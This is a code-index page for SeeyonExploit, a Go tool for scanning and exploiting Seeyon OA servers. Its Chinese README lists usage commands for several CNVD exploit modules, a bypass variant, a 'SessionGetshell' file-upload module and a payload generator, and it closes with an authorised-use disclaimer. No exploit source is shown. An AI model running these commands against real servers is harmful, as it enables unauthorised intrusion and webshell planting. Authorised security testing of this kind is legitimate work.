MCPcopy Index your code
hub / github.com/Drac0nids/SeeyonExploit

github.com/Drac0nids/SeeyonExploit @v1.0

Chat with this repo
repository ↗ · DeepWiki ↗ · release v1.0 ↗ · + Follow
39 symbols 152 edges 25 files 5 documented · 13%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

SeeyonExploit

基于go语言的致远OA漏洞检测工具

编译

go build -o SeeyonExploit main.go

漏洞扫描

./SeeyonExploit VulScan -u http://xxx.xxx.xxx.xxx

批量扫描

bash ./SeeyonExploit VulScan -f url.txt url.txt中每行一个扫描目标 wiki http://test.com http://test2.com

漏洞利用

CNVD201919299

./SeeyonExploit CNVD201919299 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

CNVD202101627

./SeeyonExploit CNVD202101627 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

HW2021 (2021HW nday 对CNVD202101627的绕过)

./SeeyonExploit HW2021 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

SessionGetshell

./SeeyonExploit SessionGetshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

辅助工具

DecAndGen

该工具可以生成CNVD202101627以及HW2021漏洞的payload或者解密payload

生成payload:

./SeeyonExploit DecAndGen -f 本地文件 -n 服务器端生成的文件名

还可以使用-o 文件名,将生成的payload输出到文件中

解密payload:

./SeeyonExploit DecAndGen -s 待解密的payload字符串或payload文件

同样可以使用-o 文件名,将生成的payload输出到文件中。-s后面可以接待解密的字符串,也可以接待解密字符串文件的文件名

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。

Core symbols most depended-on inside this repo

PanicErr
called by 18
utils/err.go
Verification
called by 12
VulScan/Verification.go
PostData
called by 6
utils/PostData.go
FixUrl
called by 5
utils/FixUrl.go
GeneratePayload
called by 5
CNVD202101627/GeneratePayload.go
Render
called by 4
utils/Render.go
GenerateTestFile
called by 4
utils/GenerateTestFile.go
GetMd5
called by 2
utils/GetMd5.go

Shape

Function 35
Struct 4

Languages

Go100%

Modules by API surface

CNVD201919299/GeneratePayload.go5 symbols
DecAndGen/DecAndGen.go4 symbols
utils/PostData.go3 symbols
CNVD202101627/GeneratePayload.go3 symbols
utils/GenerateZip.go2 symbols
cmd/root.go2 symbols
CNVD201919299/FileNameEncAndDec.go2 symbols
utils/err.go1 symbols
utils/Render.go1 symbols
utils/GetMd5.go1 symbols
utils/GenerateTestFile.go1 symbols
utils/FixUrl.go1 symbols

For agents

$ claude mcp add SeeyonExploit \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact